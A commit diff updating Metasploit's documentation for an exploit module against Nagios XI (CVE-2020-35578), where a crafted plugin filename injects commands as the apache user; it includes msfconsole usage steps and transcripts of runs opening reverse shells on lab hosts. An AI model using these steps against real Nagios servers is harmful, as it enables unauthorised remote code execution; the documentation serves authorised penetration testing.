Add in fixes to documentation and module that were covered in the review process

documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md

@@ -1,22 +1,26 @@
 ## Vulnerable Application
-This module exploits a vulnerability (CVE-2020-35578) in `/admin/monitoringplugins.php`
-that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
+This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
+page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated
+admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
 
 The module's `check` method takes advantage of the `Msf::Exploit::Remote::HTTP::NagiosXi` mixin in order to authenticate to the target and
-obtain the Nagios XI version number, which is then used to check if the target is Nagios XI 5.3.0-5.7.9 and therefore vulnerable.
+obtain the Nagios XI version number, which is then used to check if the target is Nagios XI prior to 5.8.0 and therefore vulnerable.
 
-Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`.
-This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
-Deleting the malicious plugin/file via the web interface failed during testing, so it is automatically deleted when a session spawns.
+Next, the module sends a HTTP POST request to `/admin/monitoringplugins.php` containing a file whose filename is set such that it
+will escape the existing command that `/admin/monitoringplugins.php` uses on its backend and will instead cause the server to start
+executing the attacker's own commands as the `apache` user.
+
+Once the upload is complete, a new plugin entry will be created along with a corresponding file in `/usr/local/nagios/libexec/`
+with the full payload as the file name. Deleting the malicious plugin/file via the web interface was not possible during testing,
+so it is automatically deleted when a session spawns.
 
 The module may fail during the first run. If that happens, try running it again with the same settings.
 
-The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1).
+The module supports `linux/x64` and `linux/x86` payloads (target 0) as well as `cmd/unix` payloads (target 1)
+and has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
+Valid credentials for a Nagios XI admin user are required for exploitation.
 
-Valid credentials for a Nagios XI admin user are required.
-This module has been successfully tested against Nagios XI versions 5.3.0 and 5.7.5, both running on CentOS 7.
-
-Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
+Vulnerable software for testing is available [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
 Detailed installation instructions are available
 [here](https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf)
 and an official video tutorial is available [here](https://www.youtube.com/watch?v=fBWA6t6dJ4I).
@@ -25,8 +29,8 @@ and an official video tutorial is available [here](https://www.youtube.com/watch
 1. Start msfconsole
 2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce`
 3. Do: `set RHOSTS [IP]`
-4. Do: `set USERNAME [username for the Nagios XI account]`
-5. Do: `set PASSWORD [password for the Nagios XI account]`
+4. Do: `set USERNAME [username for the Nagios XI account with administrative privileges]`
+5. Do: `set PASSWORD [password for the Nagios XI account with administrative privileges]`
 6. Do: `set target [target]`
 7. Do: `set payload [payload]`
 8. Do: `set LHOST [IP]`
@@ -47,14 +51,14 @@ The username for the Nagios XI account to authenticate with. The default value i
 ```
 Id  Name
 --  ----
-0   Linux
+0   Linux (x86/x64)
 1   CMD
 ```
 
 ## Scenarios
 ### Nagios XI 5.3.0 running on CentOS 7 - Linux target
 ```
-msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.16
 rhosts => 192.168.1.16
@@ -62,7 +66,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos
 lhost => 192.168.1.12
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosxi
 password => nagiosxi
-msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
@@ -99,12 +103,12 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Linux
+   0   Linux (x86/x64)
 
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -125,7 +129,7 @@ Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=4
 ```
 ### Nagios XI 5.7.5 running on CentOS 7 - CMD target
 ```
-msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set target 1
 target => 1
@@ -135,7 +139,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhos
 lhost => 192.168.1.12
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin
 password => nagiosadmin
-msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
@@ -177,7 +181,7 @@ Exploit target:
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
@@ -192,7 +196,7 @@ uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) contex
 ```
 ### Nagios XI 5.7.5 running on CentOS 7 (unfinished installation) - Linux target
 ```
-msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce
 [*] Using configured payload linux/x86/meterpreter/reverse_tcp
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14
 rhosts => 192.168.1.14
@@ -202,7 +206,7 @@ msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set pass
 password => nagiosadmin
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set finish_install true
 finish_install => true
-msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
 
@@ -239,12 +243,12 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Linux
+   0   Linux (x86/x64)
 
 
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Started reverse TCP handler on 192.168.1.12:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [*] Attempting to authenticate to Nagios XI...
 [!] The target seems to be a Nagios XI application that has not been fully installed yet.